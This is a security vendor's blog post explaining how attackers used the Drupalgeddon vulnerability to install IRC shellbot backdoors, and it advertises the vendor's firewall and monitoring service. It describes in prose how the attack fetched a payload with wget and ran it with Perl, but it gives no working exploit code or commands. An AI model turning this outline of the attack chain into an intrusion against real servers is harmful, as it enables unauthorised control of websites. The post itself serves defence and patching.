1 Feb, 2021

IRC Shellbot Injection Can Take Control of Your Site

Without website monitoring and WAF, Internet Relay Chat (IRC), is vulnerable to attack by shellbots. A shellbot could create or alter files, communicate with a remote server, or download malware.
Shell injection seriously compromises a website. A successful attack lets an intruder run arbitrary commands on the server. Files can be changed or added. Private information can be sent to a third party. Recently, we've seen attacks that inject or upload an IRC bot by taking advantage of a Drupal CMS vulnerability. Quttera ThreatSign helps to keep your network safe from this and many other attacks.
Shell Injection Attacks
The attack covered here is an instance of the category known as injection attacks. They come in many forms, the common feature being the use of a software bug or vulnerability to run hostile code on the server.

Shell injection attacks are among the most dangerous. They let an intruder run whatever commands they like on the target system. The name comes from the idea of running or gaining access to a command shell such as Bash or C Shell, but it's also applied to threats that don't strictly use a command shell.

They're generally two-stage attacks. The first step is to gain a foothold in the system to let the intruder run commands. The second is to enter and run commands that will alter a website, steal information, or do other things for the intruder's benefit. Once the exploit is in place, it could remain present for months while the intruder uses it intermittently. Keeping the amount of use low helps to avoid detection.

An Internet Relay Chat shellbot is one way in which intruders can gain persistent access to a server. Other channels are possible.
IRC Shellbots
The popularity of IRC peaked around 2005. Today, Web services such as Discord and Zoom chat have largely replaced it. While it isn't as popular as it used to be, it's still widely used. A moderately experienced Linux administrator can get a server installed and running in less than an hour. Many clients are available for visitors to connect to a server and start talking with each other.

The protocol is based on a philosophy of openness. Passwords aren't required to connect. Visitors assign themselves nicknames. There's no such thing as an authenticated user identity. Operators can kick trolls and spammers off and block IP addresses, but keeping anyone from coming back is hard. Some servers support SSL/TLS connections, but they only prevent man-in-the-middle attacks.

IRC accepts connections from bots as well as live users. Bots respond when addressed in certain ways. Some provide entertainment. Some spam.

An ordinary bot runs from the clients' side, but some run on the server's side, providing services. For instance, the popular NickServ maintains registered user nicknames.

Typically, a user communicates with a service by sending it a /msg command. For example, a user can set a NickServ password with

/msg NickServ set password mypassword

The most powerful IRC service bot is the shellbot. It provides access to a command shell through IRC. It should accept commands only from authorized users. Some systems use IRC just as a way to run shellbots. They give devices a low-overhead way to communicate with each other. IoT devices often use them because of their minimal system requirements.

The danger is that an intruder might find a way to install an unauthorized shellbot. If human beings never use the channel, it could go unnoticed. A shellbot can be a full backdoor. It could create or alter files, communicate with a remote server, or download malware. The only limits are the ones on the account running it.
The "Drupalgeddon" Shellbot
A shellbot attack almost always requires a vulnerability to exploit so that the attacker can install the bot. In the case we discovered, the weakness was one in old versions of Drupal, targeted by an exploit called "Drupalgeddon." In the CVE repository, it's more formally known as CVE-2018-7600. It was publicly disclosed on March 28, 2018, and a patch was released on the same day. Some servers still haven't been patched. It's a high-risk weakness since it's easy to exploit, no authentication is required, and all the data on the website is at risk.

The vulnerability was found in versions 6, 7, and 8 of Drupal. Patches were made available for all of these versions. Drupal 6 was already at end of life, but a patch was released because of the severity of the problem. The current versions of Drupal 7 and 8 are safe against the attack.

Drupalgeddon installs a backdoor shellbot on the server running Drupal. The next step is to get access to the server. There are several ways to do this. In this case, Internet Relay Chat was the channel. IRC servers don't normally require authentication to get access. If the shellbot is listening, the intruder just has to enter the appropriate commands.

The attack that we caught originated from a host belonging to a Serbian ISP. The injected exploit utilized the Drupal vulnerability to execute the wget command on the server. It downloads files from another IP address and then uses Perl to execute them, setting up the shellbot.
Protection Against the Attack
A well-maintained server isn’t likely to fall victim to this attack. There are two main points that can be strengthened to frustrate intruders.

First, keep all server software up to date. The Drupalgeddon vulnerability and patch are nearly two years old. A regularly updated CMS won't be open to the attack. Likewise, Web server software, plugins, PHP versions, themes, and modules need to be kept up to date.

System management is imperfect, of course. It's always possible to let updates and protections slip. Sometimes software can't be updated because of dependencies or the limitations of an old machine. New vulnerabilities are constantly discovered, and you can't always patch them before someone exploits them. For comprehensive Web security, you should have Quttera's ThreatSign Website Protection & Malware Cleanup. Its Web Application Firewall blocks hostile requests, including Drupalgeddon injection attempts. The ThreatSign monitoring service looks for signs of improper activity and will discover connections to remote command and control servers.

Every website is a target for online criminals. Quttera ThreatSign helps you to stay safe from their attacks. Multiple plans are available to suit your budget and security requirements.